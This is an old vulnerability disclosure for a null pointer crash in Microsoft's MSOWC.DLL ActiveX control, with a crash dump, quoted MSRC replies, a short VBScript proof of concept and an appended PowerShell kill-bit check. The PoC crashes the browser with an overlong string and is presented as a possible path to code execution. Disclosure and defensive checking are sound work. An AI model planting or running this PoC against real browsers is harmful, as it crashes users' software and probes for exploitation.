-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----------------------------------------------------------------------------
 Microsoft Office Data Source Control 9.0 (MSOWC.DLL) Null Pointer DoS

 Author: shinnai
 mail:   shinnai[at]autistici[dot]org
 site:   http://www.shinnai.net/

 File:   MSOWC.DLL
 Ver.:   9.0.0.8966
 ProgID: OWC.DataSourceControl.9
 Descr.: Microsoft Office Data Source Control 9.0

 Marked: RegKey Safe for Script: False
         RegKey Safe for Init: False
         Implements IObjectSafety:True
         IDisp Safe: Safe for untrusted: caller

 Member: DeleteRecordSourceIfUnused (ByVal RecordSource As String)

 According to MSRC:
 "In triaging this it appears that this control has already had a killbit
  released as part of an OWC patch (MS08-017).
  Also, kill-bitted by IE in
  http://www.microsoft.com/technet/security/advisory/956391.mspx
  Unless I am missing a detail here or if the killbit was unsuccessful,
  the MSRC won't open a new case for this control."

 and:
 "From our assessment this looks to be a non-exploitable null pointer."

 This is a report of the crash:

 Dump:
 3AD28D0A   . 8B40 50        MOV EAX,DWORD PTR DS:[EAX+50]; <== CRASH

 Registers:
 EAX 00000000
 ECX 0292009C
 EDX 0021FFF2
 EBX 029200FC
 ESP 0161D258
 EBP 0161D284
 ESI 0161D278
 EDI 0161D25C
 EIP 3AD28D0A MSOWC.3AD28D0A

 Stack:
 ESP ==>  > 00000008
 ESP+4    > 0292009C
 ESP+8    > 3AD28CDA  RETURN to MSOWC.3AD28CDA from MSOWC.3AD2A6C4
 ESP+C    > 01F09C64  UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."

 So if someone finds a way to manipulate EAX, code execution is possible.

 This was written for educational purposes. Use it at your own risk.
 The author will not be responsible for any damage.

 Tested on Windows XP Professional SP3 fully patched, with Internet Explorer 8
- ------------------------------------------------------------------------------

<object classid='clsid:0002E533-0000-0000-C000-000000000046' id='test'></object>

<script language='vbscript'>
 test.DeleteRecordSourceIfUnused String(1024, "A")
</script>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
-----END PGP SIGNATURE-----
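
The MSRC reply quoted above turns on whether the kill bit for this control is actually in place. The following is an added example, not part of the original advisory, that checks it on a host. It assumes the standard Internet Explorer kill-bit location (the "Compatibility Flags" value, bit 0x400, under the "ActiveX Compatibility" key); the CLSID is the classid from the PoC, and the function name Get-KillBitState is made up for this example.

```powershell
# Added example (not from the advisory): is the IE kill bit set for this control?
# CLSID is the classid from the PoC; Get-KillBitState is a name made up for this example.
$Clsid   = '{0002E533-0000-0000-C000-000000000046}'
$KillBit = 0x00000400   # "Compatibility Flags" bit that stops IE instantiating the control

# Native registry view, plus the 32-bit view that 32-bit IE reads on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-KillBitState {
    param(
        [Parameter(Mandatory)] [string] $Root,
        [Parameter(Mandatory)] [string] $Clsid
    )
    $key    = Join-Path $Root $Clsid
    $result = [ordered]@{ Key = $key; Flags = $null; KillBitSet = $false; Note = '' }

    # No per-CLSID key at all means no kill bit was ever written in this view.
    if (-not (Test-Path -LiteralPath $key)) {
        $result.Note = 'no compatibility key for this CLSID'
        return [pscustomobject]$result
    }
    # The key can exist without the value; treat that as "not set" and say so.
    $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $prop) {
        $result.Note = 'key present, Compatibility Flags value missing'
        return [pscustomobject]$result
    }
    $flags             = $prop.'Compatibility Flags'
    $result.Flags      = '0x{0:X8}' -f $flags
    # Other flag bits may be set too, so test the bit rather than comparing for equality.
    $result.KillBitSet = ($flags -band $KillBit) -ne 0
    $result.Note       = if ($result.KillBitSet) { 'kill bit set' } else { 'kill bit NOT set' }
    return [pscustomobject]$result
}

# Check every registry view that exists on this machine and show one row per view.
$Roots | Where-Object { Test-Path -LiteralPath $_ } |
    ForEach-Object { Get-KillBitState -Root $_ -Clsid $Clsid } |
    Format-Table -AutoSize
```

A view that reports "kill bit NOT set" or a missing key is a host where Internet Explorer is not blocked from instantiating the control.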